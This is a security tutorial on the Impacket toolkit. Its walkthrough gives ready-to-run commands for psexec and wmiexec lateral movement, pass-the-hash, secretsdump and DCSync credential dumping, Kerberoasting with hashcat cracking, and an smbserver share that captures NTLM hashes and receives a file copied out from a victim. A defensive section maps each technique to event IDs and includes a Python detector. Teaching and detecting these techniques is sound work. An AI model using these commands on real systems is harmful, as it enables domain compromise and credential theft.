Mastering the Impacket Suite: From Lateral Movement to Credential Extraction

Disclaimer: This article is for education and authorized security testing only. Run these tools exclusively against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is a crime in virtually every jurisdiction.

Introduction / Overview

Impacket is a collection of Python classes for working with network protocols, maintained by Fortra (formerly SecureAuth). For anyone testing Windows and Active Directory environments, it is the Swiss Army knife: pure-Python implementations of SMB, MSRPC, DCE/RPC, Kerberos, LDAP and NTLM that ship with dozens of ready-to-run example scripts.

In this article you will learn how five of the most important example scripts work and how to use them correctly:

  • psexec.py — semi-interactive shell via a Windows service (SYSTEM).
  • wmiexec.py — quieter command execution over WMI/DCOM.
  • secretsdump.py — remote and offline credential extraction.
  • GetUserSPNs.py — Kerberoasting from a low-privileged account.
  • smbserver.py — a fake SMB share for file transfer and hash capture.

Equal weight is given to the Detection & Defense section, because every one of these techniques leaves recognizable artifacts.

How it works / Background

Impacket scripts implement Windows protocols directly, so they do not need a Windows host or the Windows API. Two protocol families matter most:

  • SMB + DCE/RPC over named pipes. SMB (TCP/445) carries named pipes such as \svcctl (Service Control Manager) and \winreg (Remote Registry). psexec and the service-based parts of secretsdump ride these pipes.
  • DCOM/WMI over MSRPC. wmiexec uses the IWbemServices interface (WMI) over DCOM, brokered by the RPC endpoint mapper on TCP/135 and a dynamic high port.

Authentication is either NTLM or Kerberos. Impacket fully supports pass-the-hash (-hashes LM:NT), pass-the-ticket (-k -no-pass with a KRB5CCNAME ticket), and AES keys (-aesKey). This is what makes it so powerful: a recovered NT hash is as good as a password.

For background on how NTLM hashes are abused, see Pass-the-Hash explained.

Prerequisites / Lab setup

  • A lab domain (e.g. lab.local) with a Domain Controller and at least one member server. Build one with a vulnerable AD lab if you don't have one.
  • Impacket installed in an isolated environment:
    pipx install impacket
    # or
    python3 -m pip install impacket
  • A foothold credential set: a username with a password or an NT hash, plus network reachability to TCP/445, TCP/135 and dynamic RPC ports.

Throughout, credentials are written as domain/user:password@target.

Attack walkthrough / PoC

1. psexec.py — SYSTEM shell

psexec.py uploads a service binary to the ADMIN$ share, registers it via the Service Control Manager (\svcctl), and starts it. Output is relayed over a named pipe, giving a semi-interactive shell running as NT AUTHORITY\SYSTEM.

# Password auth
psexec.py lab.local/administrator:'P@ssw0rd!'@10.10.10.5

# Pass-the-hash (LM:NT, empty LM is fine)
psexec.py -hashes :a9fd…NTHASH lab.local/administrator@10.10.10.5

It is loud (drops a binary, creates a service), but reliable. Use it when stealth is not the priority.

2. wmiexec.py — quieter execution

wmiexec.py executes commands through WMI's Win32_Process.Create and reads the output from a temp file over SMB. No service is created and no binary is dropped, so it is considerably quieter than psexec.

wmiexec.py lab.local/svc_sql:'Summer2025'@10.10.10.6

# Run a single command non-interactively, then exit
wmiexec.py -hashes :a9fd…NTHASH lab.local/administrator@10.10.10.6 'whoami /all'

Note that wmiexec runs each command in a fresh process, so there is no persistent shell state (your cd is emulated client-side).

3. secretsdump.py — credential extraction

secretsdump.py is the credential-dumping workhorse. Against a target it extracts:

  • SAM local account hashes (via \winreg remote registry).
  • LSA secrets and cached domain credentials.
  • NTDS.dit domain hashes via DRSUAPI replication (DRSGetNCChanges) — the same primitive as DCSync.

# Local SAM + LSA secrets from a member host (needs local admin)
secretsdump.py lab.local/administrator:'P@ssw0rd!'@10.10.10.6

# Full domain dump via DCSync against a DC (needs replication rights)
secretsdump.py -just-dc lab.local/administrator@10.10.10.5

# Offline dump from registry hives you already exfiltrated
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

The -just-dc-ntlm flag limits output to NTLM hashes; -history includes password history. See DCSync attacks for the replication mechanics.

4. GetUserSPNs.py — Kerberoasting

GetUserSPNs.py queries LDAP for accounts with a Service Principal Name (servicePrincipalName) set, then requests a service ticket (TGS-REP) for each of them. The encrypted part of each ticket is protected with the service account's password-derived key, so it can be cracked offline. Any authenticated domain user can do this.

GetUserSPNs.py -request -dc-ip 10.10.10.5 lab.local/lowpriv:'UserPass1'

# Crack with hashcat mode 13100 (RC4) or 19700 (AES256)
hashcat -m 13100 spn_hashes.txt rockyou.txt

For the full crack-and-abuse chain, see Kerberoasting complete guide.

5. smbserver.py — file transfer and hash capture

smbserver.py spins up a fake SMB server. Use it to move files off a Windows host with nothing more than a built-in copy command (no HTTP server or tooling on the victim's disk), and, more interestingly, to capture NetNTLMv2 hashes when a victim authenticates to your share (e.g. via a coerced UNC path).

# Share named "share" mapped to /tmp/loot, capturing auth attempts
smbserver.py -smb2support share /tmp/loot

On the victim, running copy C:\loot.zip \\10.10.10.99\share\ exfiltrates the file; any NTLM authentication directed at the server is logged for offline cracking or relaying.

Attack flow

Diagram 1: attack flow (image not reproduced here).

Text version: a foothold enables Kerberoasting and lateral movement; dumping local secrets yields a reusable admin hash, which is used to DCSync the DC and compromise the entire domain.

Detection & Defense (Blue Team)

These techniques map to MITRE ATT&CK: T1569.002 (Service Execution / psexec), T1047 (WMI / wmiexec), T1003.001/.002/.003 (OS Credential Dumping), T1003.006 (DCSync), and T1558.003 (Kerberoasting).

Detection

  • psexec.py: Windows Security Event 4697 (a service was installed) and System Event 7045, especially with random 8-character service names and a binary path in %SYSTEMROOT%. Sysmon Event 11 for file creation in ADMIN$/C:\Windows.
  • wmiexec.py: Event 4688 showing wmiprvse.exe spawning cmd.exe /Q /c … with output redirected to \\127.0.0.1\ADMIN$\__<epoch> — a near-unique Impacket signature. Enable WMI-Activity operational logging.
  • secretsdump.py / DCSync: Event 4662 on the DC where a non-DC principal requests the replication GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes) and 1131f6ad-… (…-All). For local SAM dumping, watch remote-registry (\winreg) access and Event 4624 logon type 3 to ADMIN$/IPC$.
  • GetUserSPNs.py: Event 4769 (Kerberos service ticket requested) with encryption type 0x17 (RC4) in bulk from a single account is a classic Kerberoasting indicator.
  • smbserver.py / coercion: Outbound SMB to unexpected internal hosts, and NetNTLMv2 authentication to non-domain systems.
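The indicators above can be turned into concrete detection logic. The following Python is an added example, not code from the article or from the Impacket project: it runs the wmiexec, psexec, DCSync and Kerberoasting signatures over constructed sample events with simplified Security-log fields. The event layout, the ticket-count threshold and the "trailing $ means computer account" heuristic are assumptions.

```python
import re
from collections import Counter

# Constructed sample events (flattened Security-log fields), not real telemetry.
EVENTS = [
    {"id": 4688, "host": "WS01", "parent": "wmiprvse.exe",
     "cmd": r"cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1717000000.12 2>&1"},
    {"id": 4688, "host": "WS01", "parent": "explorer.exe", "cmd": "notepad.exe"},
    {"id": 4697, "host": "WS01", "service": "XkQpLmNz", "path": r"%SYSTEMROOT%\XkQpLmNz.exe"},
    {"id": 4697, "host": "WS01", "service": "Sysmon64", "path": r"C:\Windows\Sysmon64.exe"},
    {"id": 4662, "host": "DC01", "account": "svc_backup",
     "props": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "host": "DC01", "account": "DC02$",
     "props": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
] + [{"id": 4769, "host": "DC01", "account": "lowpriv", "etype": "0x17",
      "service": f"MSSQLSvc/sql{i}.lab.local"} for i in range(6)]

# wmiexec.py redirects command output to \\127.0.0.1\ADMIN$\__<epoch>.
WMIEXEC_RE = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+(\.\d+)?")
# psexec.py indicator described above: random 8-letter service name under %SYSTEMROOT%.
PSEXEC_SVC_RE = re.compile(r"^[A-Za-z]{8}$")
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}  # DS-Replication-Get-Changes-All

def detect(events, roast_threshold=5):
    """Return (rule, host, detail) tuples for Impacket-style activity in events."""
    findings, rc4_tgs = [], Counter()
    for ev in events:
        eid = ev["id"]
        if eid == 4688 and ev["parent"].lower() == "wmiprvse.exe" and WMIEXEC_RE.search(ev["cmd"]):
            findings.append(("wmiexec", ev["host"], ev["cmd"]))
        elif eid == 4697 and PSEXEC_SVC_RE.match(ev["service"]) and "%SYSTEMROOT%" in ev["path"].upper():
            findings.append(("psexec", ev["host"], ev["service"]))
        elif eid == 4662:
            # Assumption: a trailing '$' marks a computer (DC) account; anything else is a user.
            guids = set(re.findall(r"[0-9a-f-]{36}", ev["props"].lower()))
            if guids & REPL_GUIDS and not ev["account"].endswith("$"):
                findings.append(("dcsync", ev["host"], ev["account"]))
        elif eid == 4769 and ev["etype"].lower() == "0x17":
            rc4_tgs[(ev["host"], ev["account"])] += 1
    # Many RC4 service tickets for one account in a short window is the Kerberoasting pattern.
    for (host, account), n in rc4_tgs.items():
        if n >= roast_threshold:
            findings.append(("kerberoast", host, account))
    return findings

if __name__ == "__main__":
    for rule, host, detail in detect(EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

In a real pipeline the same functions would consume parsed EVTX or SIEM records; the benign explorer.exe, Sysmon64 and DC02$ events are included to show what the rules correctly ignore.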

Defense / Mitigation

  • Tier your admins. Never log on to a member workstation with a Domain Admin account; this prevents secretsdump from harvesting privileged hashes. Use the tiered administration model.
  • Enable LSA Protection (RunAsPPL) and Credential Guard to make credential extraction far harder.
  • Strong, long service-account passwords (25+ chars) or gMSA / dMSA managed accounts defeat Kerberoasting; disable RC4 in Kerberos where possible (msDS-SupportedEncryptionTypes).
  • Enforce SMB signing and disable NTLM where feasible to break relay and hash capture from smbserver.py.
  • Restrict replication rights so only Domain Controllers hold DS-Replication-Get-Changes-All, and alert on any 4662 deviation.
  • Restrict remote service creation and WMI via host firewall and Attack Surface Reduction rules; segment so workstations cannot reach 445/135 on each other.

Conclusion

Impacket condenses years of Windows protocol research into a handful of Python scripts. The same five tools that drive a domain compromise — psexec, wmiexec, secretsdump, GetUserSPNs and smbserver — also produce highly recognizable telemetry. Defenders who instrument service creation (4697/7045), WMI process trees (4688), Kerberos ticket requests (4769) and replication access (4662) can catch nearly every step. Master the offense to build the defense.
